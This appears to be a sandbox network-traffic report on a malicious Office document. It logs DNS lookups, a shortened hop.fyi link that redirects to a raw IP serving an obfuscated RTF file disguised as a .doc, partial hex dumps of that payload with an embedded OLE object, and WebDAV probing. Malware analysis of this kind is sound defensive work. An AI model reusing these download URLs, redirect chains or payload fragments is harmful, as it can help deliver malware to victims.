        Jul 3, 2024 17:58:44.106005907 CEST53529178.8.8.8192.168.2.22
        Jul 3, 2024 17:58:44.922555923 CEST6275153192.168.2.228.8.8.8
        Jul 3, 2024 17:58:44.929579973 CEST53627518.8.8.8192.168.2.22
        Jul 3, 2024 17:58:44.931514025 CEST5789353192.168.2.228.8.8.8
        Jul 3, 2024 17:58:44.941504955 CEST53578938.8.8.8192.168.2.22
        Jul 3, 2024 17:58:49.396789074 CEST5482153192.168.2.228.8.8.8
        Jul 3, 2024 17:58:49.506264925 CEST53548218.8.8.8192.168.2.22
        Jul 3, 2024 17:58:49.509198904 CEST5471953192.168.2.228.8.8.8
        Jul 3, 2024 17:58:49.516542912 CEST53547198.8.8.8192.168.2.22
        Jul 3, 2024 17:58:51.363723040 CEST4988153192.168.2.228.8.8.8
        Jul 3, 2024 17:58:51.371409893 CEST53498818.8.8.8192.168.2.22
        Jul 3, 2024 17:58:51.372675896 CEST5499853192.168.2.228.8.8.8
        Jul 3, 2024 17:58:51.379997969 CEST53549988.8.8.8192.168.2.22
        Jul 3, 2024 17:58:58.994771957 CEST5278153192.168.2.228.8.8.8
        Jul 3, 2024 17:58:59.058000088 CEST6392653192.168.2.228.8.8.8
        Jul 3, 2024 17:58:59.967170954 CEST53639268.8.8.8192.168.2.22
        Jul 3, 2024 17:58:59.970226049 CEST53527818.8.8.8192.168.2.22
        Jul 3, 2024 17:58:59.985577106 CEST6551053192.168.2.228.8.8.8
        Jul 3, 2024 17:58:59.993601084 CEST53655108.8.8.8192.168.2.22
        Jul 3, 2024 17:59:00.858489990 CEST6267253192.168.2.228.8.8.8
        Jul 3, 2024 17:59:00.866265059 CEST53626728.8.8.8192.168.2.22
        Jul 3, 2024 17:59:00.867794991 CEST5647553192.168.2.228.8.8.8
        Jul 3, 2024 17:59:00.875243902 CEST53564758.8.8.8192.168.2.22
        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
        Jul 3, 2024 17:58:41.925688982 CEST192.168.2.228.8.8.80xfd29Standard query (0)hop.fyiA (IP address)IN (0x0001)false
        Jul 3, 2024 17:58:44.098741055 CEST192.168.2.228.8.8.80xbdb7Standard query (0)hop.fyiA (IP address)IN (0x0001)false
        Jul 3, 2024 17:58:44.922555923 CEST192.168.2.228.8.8.80xf3e0Standard query (0)hop.fyiA (IP address)IN (0x0001)false
        Jul 3, 2024 17:58:44.931514025 CEST192.168.2.228.8.8.80x3be2Standard query (0)hop.fyiA (IP address)IN (0x0001)false
        Jul 3, 2024 17:58:49.396789074 CEST192.168.2.228.8.8.80x1100Standard query (0)hop.fyiA (IP address)IN (0x0001)false
        Jul 3, 2024 17:58:49.509198904 CEST192.168.2.228.8.8.80x2664Standard query (0)hop.fyiA (IP address)IN (0x0001)false
        Jul 3, 2024 17:58:51.363723040 CEST192.168.2.228.8.8.80xb6ecStandard query (0)hop.fyiA (IP address)IN (0x0001)false
        Jul 3, 2024 17:58:51.372675896 CEST192.168.2.228.8.8.80xd97eStandard query (0)hop.fyiA (IP address)IN (0x0001)false
        Jul 3, 2024 17:58:58.994771957 CEST192.168.2.228.8.8.80x43edStandard query (0)uploaddeimagens.com.brA (IP address)IN (0x0001)false
        Jul 3, 2024 17:58:59.058000088 CEST192.168.2.228.8.8.80x9c5bStandard query (0)hop.fyiA (IP address)IN (0x0001)false
        Jul 3, 2024 17:58:59.985577106 CEST192.168.2.228.8.8.80x4189Standard query (0)hop.fyiA (IP address)IN (0x0001)false
        Jul 3, 2024 17:59:00.858489990 CEST192.168.2.228.8.8.80x2383Standard query (0)hop.fyiA (IP address)IN (0x0001)false
        Jul 3, 2024 17:59:00.867794991 CEST192.168.2.228.8.8.80x1185Standard query (0)hop.fyiA (IP address)IN (0x0001)false
        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
        Jul 3, 2024 17:58:41.932961941 CEST8.8.8.8192.168.2.220xfd29No error (0)hop.fyi192.185.89.92A (IP address)IN (0x0001)false
        Jul 3, 2024 17:58:44.106005907 CEST8.8.8.8192.168.2.220xbdb7No error (0)hop.fyi192.185.89.92A (IP address)IN (0x0001)false
        Jul 3, 2024 17:58:44.929579973 CEST8.8.8.8192.168.2.220xf3e0No error (0)hop.fyi192.185.89.92A (IP address)IN (0x0001)false
        Jul 3, 2024 17:58:44.941504955 CEST8.8.8.8192.168.2.220x3be2No error (0)hop.fyi192.185.89.92A (IP address)IN (0x0001)false
        Jul 3, 2024 17:58:49.506264925 CEST8.8.8.8192.168.2.220x1100No error (0)hop.fyi192.185.89.92A (IP address)IN (0x0001)false
        Jul 3, 2024 17:58:49.516542912 CEST8.8.8.8192.168.2.220x2664No error (0)hop.fyi192.185.89.92A (IP address)IN (0x0001)false
        Jul 3, 2024 17:58:51.371409893 CEST8.8.8.8192.168.2.220xb6ecNo error (0)hop.fyi192.185.89.92A (IP address)IN (0x0001)false
        Jul 3, 2024 17:58:51.379997969 CEST8.8.8.8192.168.2.220xd97eNo error (0)hop.fyi192.185.89.92A (IP address)IN (0x0001)false
        Jul 3, 2024 17:58:59.967170954 CEST8.8.8.8192.168.2.220x9c5bNo error (0)hop.fyi192.185.89.92A (IP address)IN (0x0001)false
        Jul 3, 2024 17:58:59.970226049 CEST8.8.8.8192.168.2.220x43edNo error (0)uploaddeimagens.com.br188.114.96.3A (IP address)IN (0x0001)false
        Jul 3, 2024 17:58:59.970226049 CEST8.8.8.8192.168.2.220x43edNo error (0)uploaddeimagens.com.br188.114.97.3A (IP address)IN (0x0001)false
        Jul 3, 2024 17:58:59.993601084 CEST8.8.8.8192.168.2.220x4189No error (0)hop.fyi192.185.89.92A (IP address)IN (0x0001)false
        Jul 3, 2024 17:59:00.866265059 CEST8.8.8.8192.168.2.220x2383No error (0)hop.fyi192.185.89.92A (IP address)IN (0x0001)false
        Jul 3, 2024 17:59:00.875243902 CEST8.8.8.8192.168.2.220x1185No error (0)hop.fyi192.185.89.92A (IP address)IN (0x0001)false
        • uploaddeimagens.com.br
        • hop.fyi
        • 198.46.178.139
        • 91.92.254.29
        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.2249163192.185.89.92801324C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        TimestampBytes transferredDirectionData
        Jul 3, 2024 17:58:41.943947077 CEST319OUTGET /sWel7 HTTP/1.1
        Accept: */*
        UA-CPU: AMD64
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: hop.fyi
        Connection: Keep-Alive
        Jul 3, 2024 17:58:42.562117100 CEST648INHTTP/1.1 301 Moved Permanently
        Date: Wed, 03 Jul 2024 15:58:42 GMT
        Server: Apache
        Cache-Control: no-cache, no-store, private
        Expires: -1
        Upgrade: h2,h2c
        Connection: Upgrade, Keep-Alive
        Location: http://198.46.178.139/33144/ee/uh.uh.uhuhuh.uu.uh.doc
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Access-Control-Allow-Origin: *
        Content-Length: 218
        Keep-Alive: timeout=5, max=75
        Content-Type: text/html; charset=UTF-8
        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 9d 91 3d 0f 82 30 10 86 77 7f 45 ed c2 44 2b 81 28 68 61 f1 63 d5 18 1c 1c 11 4e 4b c2 87 96 ab 89 ff de 42 4d 48 1c e9 35 69 2f b9 bb f7 7d 72 62 be 3b 6e d3 eb 69 4f 24 d6 55 32 13 f6 21 e6 08 09 59 61 bf 43 5a 03 66 24 97 99 ea 00 63 7a 49 0f 6e 48 09 ff 2f 90 88 4f 17 5e ba 7c c7 54 c1 5d 41 27 29 c9 db 06 a1 31 5d 8b 8d 56 55 ec f4 45 6b ce bd 28 64 c1 92 79 ab 90 79 7e c4 7d df 0b 02 0e c0 b5 64 c3 ed 83 69 dd 27 45 9b 3b 83 da 28 87 25 56 90 9c a1 28 15 e4 58 36 0f 82 2d 99 34 59 70 3b cb 62 f3 91 5b dc da e2 33 12 fe 69 09 43 6b 10 63 3a 49 94 26 13 bd 66 09 fb 19 b5 ee 8c e1 7e 67 5f 92 c5 70 fd ca 01 00 00
        Data Ascii: =0wED+(hacNKBMH5i/}rb;niO$U2!YaCZf$czInH/O^|T]A')1]VUEk(dyy~}di'E;(%V(X6-4Yp;b[3iCkc:I&f~g_p


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        1192.168.2.2249164198.46.178.139801324C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        TimestampBytes transferredDirectionData
        Jul 3, 2024 17:58:42.581969976 CEST352OUTGET /33144/ee/uh.uh.uhuhuh.uu.uh.doc HTTP/1.1
        Accept: */*
        UA-CPU: AMD64
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: 198.46.178.139
        Connection: Keep-Alive
        Jul 3, 2024 17:58:43.069353104 CEST1236INHTTP/1.1 200 OK
        Date: Wed, 03 Jul 2024 15:58:42 GMT
        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
        Last-Modified: Wed, 03 Jul 2024 02:04:37 GMT
        ETag: "2d160-61c4e40a2a928"
        Accept-Ranges: bytes
        Content-Length: 184672
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: application/msword
        Data Raw: 7b 5c 72 74 66 31 0d 0d 0d 0d 0d 0d 09 09 09 09 09 09 09 7b 5c 2a 5c 6a 75 73 74 69 66 69 63 61 74 69 6f 6e 31 34 31 30 34 35 33 32 37 20 5c 2d 7d 0d 7b 5c 39 35 33 39 35 34 38 31 30 29 2e 3f 2e 5b 7e 37 3f 2d 29 31 30 b0 37 b0 5e b0 36 3a 21 38 30 25 29 39 35 5f 3f 28 2a 34 21 3d 3e 2c 2e b5 2a 2c b5 3f 60 30 3b 29 b5 36 3f 3f 3c 3f 29 7e 7c 2a 2f 2d 2b b0 26 3d 5d 34 26 3a b5 7e 5f 2f 39 3c 5e 33 2a 2a 2d 60 38 40 5f 7c 2b 40 32 36 39 2d 34 3c 3e 5f 3f 5e 2d 3f 37 5e 5e 3f 2a 2d b5 39 2a 25 3f 39 3c 32 3e 3e 30 3d 3e 27 5b 25 3e 2f 38 3f 27 2b 33 26 3b 3f 5f 25 60 2e 27 3f 31 2f 29 3b 3f 32 7c 37 5d 29 34 36 2c 3a 7c 3f 3b 35 23 31 a7 3b 3c 3b 30 3f 30 24 34 60 23 3d 27 33 3f 5e 25 38 2c b5 3c 3c 3a 38 3b 33 2d b0 21 32 36 37 2c a7 30 3f 2f 26 29 24 5d 34 5e 24 36 2f 24 b0 a7 2a 25 3d 2c 3f 21 3f 3d 3f 31 3c 7e 34 5b 3d 31 2a 26 2a 30 25 7e 3f 60 29 33 40 25 3f 2a 39 25 2b 3f 3d 3b 3f 3f 34 28 3f 29 7c 7c 2f 5d 2e 25 3d 3b 2a 5d 3f 3f 24 35 3f 26 2c 2f 30 3b 27 3d 5f 23 3a 39 3b 38 5f 3f 33 2b 3f [TRUNCATED]
        Data Ascii: {\rtf1{\*\justification141045327 \-}{\953954810).?.[~7?-)107^6:!80%)95_?(*4!=>,.*,?`0;)6??<?)~|*/-+&=]4&:~_/9<^3**-`8@_|+@269-4<>_?^-?7^^?*-9*%?9<2>>0=>'[%>/8?'+3&;?_%`.'?1/);?2|7])46,:|?;5#1;<;0?0$4`#='3?^%8,<<:8;3-!267,0?/&)$]4^$6/$*%=,?!?=?1<~4[=1*&*0%~?`)3@%?*9%+?=;??4(?)||/].%=;*]??$5?&,/0;'=_#:9;8_?3+?1'`8(7?*(.&+!)?63%83',%@!=<'%?5'=723]29~2=6~]5->$<2)[#+9@,^?1%5(8+&=<.(?3!2`]/.8`:=68:8.6@^[#*5,9%?*)@/%1%;'?&^,-<095?0>?]0;*=_,47:;+.?]!9;&~;^[?%8(]-97@1]6|.-%&#=9)_&!5>,/!<$4>..0/6&?:[>3.]?4'!@10^_:-'3='%&<?%<62)*-)-'@#!&_/*=[41?]<>3]4_!58^].<>?(*_^;]#%)??/%?#5/9=^'>(]!74?0(5?>:!+(<%87.(=?_;%_?@,::#)%2+6*3!4%_]?[:/.?^0<,_#$1$1$?]/]^?~6]-%<?$3|=%1=+9%<4%:?>]~![+]-,7/,:?=%?3;8>4_))%;)?%=?@0#2$&]*-5..'^%$#&@7<7?&?=?:`%7#?0^|1?*|9);|=9;%+~?&@4!(_.4)8>0%^&>]?~_=66..?3)?[>|%$^!97~:2^~(5(!~$!#7$!'3'6-%~?(],?_-55&/9'+*[06`1^+2]]$.]?(/]1~9&
        Jul 3, 2024 17:58:43.069376945 CEST1236INData Raw: 3d 2b 5f 5e a7 26 3f 5f 5f 5e 21 37 5e 7c 31 7c 3e 2b 5f 5d 5f 27 27 29 7c 23 5b 3f 3f 32 30 3f 33 5e 2e 3f 24 23 3f 37 25 2f 60 38 25 3d 30 2a 40 24 7c 32 b0 3b 2f 5b b0 21 29 2f 38 2b 3f 3e 23 7c 37 2e 7e 2e 35 3e 60 3c 3a 40 27 24 3f 24 39 24
        Data Ascii: =+_^&?__^!7^|1|>+_]_'')|#[??20?3^.?$#?7%/`8%=0*@$|2;/[!)/8+?>#|7.~.5>`<:@'$?$9$3[[5^5?~.~<,=(8?^^.(!^42+,^_9'|68,<!]?:(023-#]#9-:42+;%5^&%9:%@]#$?,()=@?;*[$?'++,~$2(](~><|^9',?|)_?:41?<^>)<+@|?.!36?|.7~;;=`55&?[~26:<(9-!)%
        Jul 3, 2024 17:58:43.069387913 CEST448INData Raw: 5b a7 38 25 2d 3f 24 3f 2f 5d 27 5e 25 2c a7 33 33 3f 31 3f a7 23 33 3c 3a 7e 2f 5f 7e 2c 26 60 3f 25 2b 30 5b 25 33 7e 35 36 27 40 3c 25 3f 3d 24 3f 2c 3c 3f 2a 2b 36 60 b0 32 3f 7c 29 27 27 3a b5 24 b5 60 25 5b 5b 3b 60 39 35 27 29 38 31 2a 3f
        Data Ascii: [8%-?$?/]'^%,33?1?#3<:~/_~,&`?%+0[%3~56'@<%?=$?,<?*+6`2?|)'':$`%[[;`95')81*?6?,?9_,?8')^#`;]0&*,`1.#~5:03?1=[/^[1,7*621-[$:<?#^~/?!?_*94?]2>?:&|0<]?02=6=?#%;1^~*:%;~7]73>*+38(7=&<`(+`5@;@(<%2*@;&@/&+_%3+2?]%];%@??@#=)*#?(!,![%?2
        Jul 3, 2024 17:58:43.069580078 CEST1236INData Raw: 5b 3f 36 26 5b b0 7e 27 30 3a 27 37 5d 5d 32 2c 33 5e 2a 2e 2e b5 2a 60 3b 30 24 40 7c 3a 2f 23 3f 37 39 35 31 3b 3c 28 5b 3f 5b 3f 3f 5f b0 38 32 2f 36 33 b0 60 7c 34 7e 36 3f 3f 60 38 26 25 5e 27 5e 26 3f 38 5f 40 2b 3e 35 60 25 3e 28 40 31 2f
        Data Ascii: [?6&[~'0:'7]]2,3^*..*`;0$@|:/#?7951;<([?[??_82/63`|4~6??`8&%^'^&?8_@+>5`%>(@1/?^^)'7?].%):%;?~'!5?(=:.1<~|%$'0<&??/%=9,/));_4,?#;(!?3%@#7^]1=._]4!%??07#=~,_#5)??,_];69!,%3<,?|=#*$?~61?,2/3(<9,'?21&%.>%`^+?0*?7-?/;|9'</?54?9??'.
        Jul 3, 2024 17:58:43.069766045 CEST1236INData Raw: 2b 7e 25 33 b5 60 33 5e 5b 2f 28 40 3e 5b 31 5e 3d 38 3e 2b 28 2e 2d 2f a7 3f 36 35 2b 37 3f 5d 2c 2c 2d 40 25 2f 26 a7 7c 2d 3f 34 23 2c 2f 35 39 3f a7 2c 30 3f 30 3c 7e 3d 3f a7 3e 25 7e 2c 2f 38 2e 2a 25 31 39 5b 3f 5d 28 2d 23 5f 7e 21 34 38
        Data Ascii: +~%3`3^[/(@>[1^=8>+(.-/?65+7?],,-@%/&|-?4#,/59?,0?0<~=?>%~,/8.*%19[?](-#_~!48-[7??'^=30|`_)+-25#(4%*)&)]%'66!?#`(^0<?.3'~36&4.)-,?(.~@`1|''1+,?4*)>?]26,=`729-?<1.%&%2=7*(=%;~=<;?;4&`]*.2(5<5%?6~>_3?)=&0`7/+9&??^!8,8*|;<?$52_=(:4?*?
        Jul 3, 2024 17:58:43.069777966 CEST1236INData Raw: 3e 25 b5 3f 3f 3a 21 2e 3f a7 32 2e 5f 60 60 32 27 33 24 60 b0 5e 21 27 25 2e 38 27 2b 39 2a 2c 3f 2a 26 32 33 3a 34 2e 3e 25 5f 2e 39 29 30 30 3b 34 3a 7e 3f 5e 38 21 2b 25 34 3e 7c 34 25 23 25 5e 3d 3d 3e b5 35 36 3a 23 34 2e 33 2c 21 40 21 a7
        Data Ascii: >%??:!.?2._``2'3$`^!'%.8'+9*,?*&23:4.>%_.9)00;4:~?^8!+%4>|4%#%^==>56:#4.3,!@!7#@$4'143??~;$]36=1?>#&++40('3%/;(73_`9?,$32|<?#09.'7.&)]?~,?$!&`',*5(*/3#8.|`-8?=_'!6!~8!7%]49?!?.5';`=#?5?-^<?/[&?<5&<_09?-^8?`,|<5'_|#`==93~7?!._()9
        Jul 3, 2024 17:58:43.070106030 CEST1236INData Raw: 36 5f 7e 5f b0 40 7c 3c 21 26 3a 31 36 3e 2e 3d 38 38 31 2f 28 2c 60 27 33 3e 28 28 32 3f 5f 29 30 29 2a 2d 39 2c 3f 3f 2b 3f 2e 39 29 37 3f a7 21 35 35 2f 24 21 25 32 36 3f 25 2f 38 7e 2f 3f 35 3d 3d 37 3f 2a 5e 3f 5d 27 3c 21 5d 5b 21 7e 32 5e
        Data Ascii: 6_~_@|<!&:16>.=881/(,`'3>((2?_)0)*-9,??+?.9)7?!55/$!%26?%/8~/?5==7?*^?]'<!][!~2^%_=6]~3*:$664?45]-]!?|?'~)6|$?%=-?>;?.6?/?.(+(&:5.<<%?>-5([!<*2%!8~1<<:#'2,41+&?/67*8,_?[-1?_9#.]_)[|,8](0-!?:?%&;5%;%|~1%@$^:20@3>?<6(?@);88%?0*?4_8=--^
        Jul 3, 2024 17:58:43.070116997 CEST1236INData Raw: 33 35 35 31 32 37 30 35 20 5c 62 69 6e 30 30 5c 35 33 34 33 32 34 34 36 32 35 36 32 31 31 38 32 38 37 7d 0d 7b 5c 2a 5c 66 4c 6f 63 6b 41 67 61 69 6e 73 74 55 6e 67 72 6f 75 70 69 6e 67 33 33 31 35 33 39 33 38 38 20 5c 62 69 6e 30 30 30 30 30 30
        Data Ascii: 35512705 \bin00\534324462562118287}{\*\fLockAgainstUngrouping331539388 \bin000000\90655501371030445}\mmreccur36\cts707275366\'{\object\sxkxfwewrmXPTVKBZVWVNRAFBLT2456653779
        Jul 3, 2024 17:58:43.070127964 CEST1236INData Raw: 0d 0a 0d 32 33 33 34 20 20 09 20 09 20 20 09 09 09 09 20 20 20 20 09 09 20 09 09 20 09 09 09 20 20 09 09 09 09 20 09 09 20 20 20 20 09 09 09 20 09 09 20 09 09 20 20 20 09 09 09 20 20 20 20 20 20 20 09 20 20 09 20 09 20 20 09 20 20 09 20 31 09 20
        Data Ascii: 2334 1 58 7
        Jul 3, 2024 17:58:43.070137978 CEST1236INData Raw: 09 09 20 20 20 20 20 20 20 20 20 20 09 20 09 09 20 09 09 09 09 09 20 09 20 20 09 09 09 20 09 20 09 20 09 20 63 0a 0d 0d 0d 0d 0d 0a 0d 0a 0d 66 0d 0d 0d 0a 0a 0d 0a 0d 0a 0d 31 31 0d 0d 0d 0a 0a 0d 0a 0d 0a 0d 65 0a 0d 0a 0a 0d 0d 0d 0d 0a 0d 30
        Data Ascii: cf11e0a1b11 a e
        Jul 3, 2024 17:58:43.075084925 CEST1236INData Raw: 09 20 09 20 09 20 20 09 20 09 09 20 09 20 20 09 09 09 20 09 09 09 09 09 09 09 20 09 20 09 20 20 09 20 20 20 09 09 09 09 09 09 09 09 20 09 20 09 20 09 20 36 09 20 20 09 20 09 20 20 09 20 20 09 09 20 20 20 20 09 09 20 20 09 20 09 20 20 20 20 09 20
        Data Ascii: 6 00000000 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        2192.168.2.2249165192.185.89.92801432C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        TimestampBytes transferredDirectionData
        Jul 3, 2024 17:58:44.115096092 CEST129OUTOPTIONS / HTTP/1.1
        User-Agent: Microsoft Office Protocol Discovery
        Host: hop.fyi
        Content-Length: 0
        Connection: Keep-Alive
        Jul 3, 2024 17:58:44.653597116 CEST295INHTTP/1.1 200 OK
        Date: Wed, 03 Jul 2024 15:58:44 GMT
        Server: Apache
        Allow: GET,HEAD
        Cache-Control: no-cache, private
        Upgrade: h2,h2c
        Connection: Upgrade, Keep-Alive
        Access-Control-Allow-Origin: *
        Content-Length: 0
        Keep-Alive: timeout=5, max=75
        Content-Type: text/html; charset=UTF-8


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        3192.168.2.2249166192.185.89.92801432C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        TimestampBytes transferredDirectionData
        Jul 3, 2024 17:58:44.947357893 CEST113OUTHEAD /sWel7 HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Microsoft Office Existence Discovery
        Host: hop.fyi
        Jul 3, 2024 17:58:45.519617081 CEST362INHTTP/1.1 301 Moved Permanently
        Date: Wed, 03 Jul 2024 15:58:45 GMT
        Server: Apache
        Cache-Control: no-cache, no-store, private
        Expires: -1
        Upgrade: h2,h2c
        Connection: Upgrade, Keep-Alive
        Location: http://198.46.178.139/33144/ee/uh.uh.uhuhuh.uu.uh.doc
        Access-Control-Allow-Origin: *
        Keep-Alive: timeout=5, max=75
        Content-Type: text/html; charset=UTF-8
        Jul 3, 2024 17:58:45.728163004 CEST362INHTTP/1.1 301 Moved Permanently
        Date: Wed, 03 Jul 2024 15:58:45 GMT
        Server: Apache
        Cache-Control: no-cache, no-store, private
        Expires: -1
        Upgrade: h2,h2c
        Connection: Upgrade, Keep-Alive
        Location: http://198.46.178.139/33144/ee/uh.uh.uhuhuh.uu.uh.doc
        Access-Control-Allow-Origin: *
        Keep-Alive: timeout=5, max=75
        Content-Type: text/html; charset=UTF-8


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        4192.168.2.2249167198.46.178.139801432C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        TimestampBytes transferredDirectionData
        Jul 3, 2024 17:58:45.527859926 CEST146OUTHEAD /33144/ee/uh.uh.uhuhuh.uu.uh.doc HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Microsoft Office Existence Discovery
        Host: 198.46.178.139
        Jul 3, 2024 17:58:46.016033888 CEST323INHTTP/1.1 200 OK
        Date: Wed, 03 Jul 2024 15:58:45 GMT
        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
        Last-Modified: Wed, 03 Jul 2024 02:04:37 GMT
        ETag: "2d160-61c4e40a2a928"
        Accept-Ranges: bytes
        Content-Length: 184672
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: application/msword


        Session IDSource IPSource PortDestination IPDestination Port
        5192.168.2.2249168192.185.89.9280
        TimestampBytes transferredDirectionData
        Jul 3, 2024 17:58:49.523022890 CEST124OUTOPTIONS / HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
        translate: f
        Host: hop.fyi
        Jul 3, 2024 17:58:50.059082985 CEST295INHTTP/1.1 200 OK
        Date: Wed, 03 Jul 2024 15:58:49 GMT
        Server: Apache
        Allow: GET,HEAD
        Cache-Control: no-cache, private
        Upgrade: h2,h2c
        Connection: Upgrade, Keep-Alive
        Access-Control-Allow-Origin: *
        Content-Length: 0
        Keep-Alive: timeout=5, max=75
        Content-Type: text/html; charset=UTF-8
        Jul 3, 2024 17:58:50.373819113 CEST154OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69
        Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: hop.fyi
        Jul 3, 2024 17:58:50.660758972 CEST295INHTTP/1.1 200 OK
        Date: Wed, 03 Jul 2024 15:58:49 GMT
        Server: Apache
        Allow: GET,HEAD
        Cache-Control: no-cache, private
        Upgrade: h2,h2c
        Connection: Upgrade, Keep-Alive
        Access-Control-Allow-Origin: *
        Content-Length: 0
        Keep-Alive: timeout=5, max=75
        Content-Type: text/html; charset=UTF-8
        Jul 3, 2024 17:58:50.664863110 CEST295INHTTP/1.1 200 OK
        Date: Wed, 03 Jul 2024 15:58:49 GMT
        Server: Apache
        Allow: GET,HEAD
        Cache-Control: no-cache, private
        Upgrade: h2,h2c
        Connection: Upgrade, Keep-Alive
        Access-Control-Allow-Origin: *
        Content-Length: 0
        Keep-Alive: timeout=5, max=75
        Content-Type: text/html; charset=UTF-8
        Jul 3, 2024 17:58:50.828782082 CEST960INHTTP/1.1 405 Method Not Allowed
        Date: Wed, 03 Jul 2024 15:58:50 GMT
        Server: Apache
        allow: GET, HEAD
        Cache-Control: no-cache, private
        Vary: Accept-Encoding
        Access-Control-Allow-Origin: *
        Keep-Alive: timeout=5, max=74
        Connection: Keep-Alive
        Transfer-Encoding: chunked
        Content-Type: text/html; charset=UTF-8
        Data Raw: 32 37 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 63 6f 6c 6f 72 3a 20 23 32 32 32 3b 20 66 6f 6e 74 3a 20 31 36 70 78 2f 31 2e 35 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 [TRUNCATED]
        Data Ascii: 276<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta name="robots" content="noindex,nofollow" /> <style> body { background-color: #fff; color: #222; font: 16px/1.5 -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif; margin: 0; } .container { margin: 30px; max-width: 600px; } h1 { color: #dc3545; font-size: 24px; }</style> </head> <body> <div class="container"> <h1>Whoops, looks like something went wrong.</h1> </div> </body></html>0


        Session IDSource IPSource PortDestination IPDestination Port
        6192.168.2.2249169192.185.89.9280
        TimestampBytes transferredDirectionData
        Jul 3, 2024 17:58:51.386015892 CEST154OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69
        Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: hop.fyi
        Jul 3, 2024 17:58:51.948626995 CEST986INHTTP/1.1 405 Method Not Allowed
        Date: Wed, 03 Jul 2024 15:58:51 GMT
        Server: Apache
        allow: GET, HEAD
        Cache-Control: no-cache, private
        Upgrade: h2,h2c
        Connection: Upgrade, Keep-Alive
        Vary: Accept-Encoding
        Access-Control-Allow-Origin: *
        Keep-Alive: timeout=5, max=75
        Transfer-Encoding: chunked
        Content-Type: text/html; charset=UTF-8
